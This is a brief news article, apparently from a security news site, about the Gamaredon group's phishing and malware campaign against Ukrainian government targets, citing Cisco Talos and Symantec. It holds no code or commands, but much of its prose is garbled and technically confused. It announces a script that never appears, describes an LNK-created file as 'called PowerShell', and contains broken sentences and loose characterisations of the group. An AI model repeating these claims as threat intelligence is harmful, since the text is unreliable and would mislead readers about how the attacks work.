Russian Gamaredon hackers using info-stealing malware to target the Ukrainian Government. According to CiscoTalos, a new form of phishing using tools such as LNK files, PowerShell, and VBScript enables initial access by the Russian hackers and makes use of Russian language specific to Ukraine. This new tactic gives them access to the computer, which they then try to gain more access using malicious binaries.
Gamaredon hackers, also known as Actinium, Armageddon, Primitive Bear, Shuckworm, and Trident Ursa, is a cyber criminal outfit that first appeared in late 2013. They are responsible for much of the chaos that ensued following Russia’s invasion of Ukraine in February of 2022.
Symantec reported in their latest campaign, the hacking group installed malware called Giddome and Pterodo. They target financial institutions or media companies with the intention to gain access to our data for the long-term.This technique infects targets with remote templates. Once opened, macros in a Word document execute to retrieve files to infect the target.
There is a file created by the LNK which is called PowerShell which is triggered once the victim is tricked into opening it.
The following script provides persistent access to the compromised system and delivers additional malware, including a new malware capable of plundering files from the machine and any removable drive connected to it.
Researchers found the Giddome backdoor family can cause additional binary and script-based payloads you may be stumbled upon.
These findings come at an important moment, amidst the conflict between Russia and Ukraine. Just last month, Google’s Threat Analysis Group disclosed that there were as many as five different campaigns by a group with links to the Conti cyber-crime cartel.
WordPress Powered Sites Backdoored after FishPig Supply Chain Attack
Webworm Hackers Use Modified RATs in Latest Cyber Espionage Attacks
Malware Attacks Targeting Gamers Increase in 2022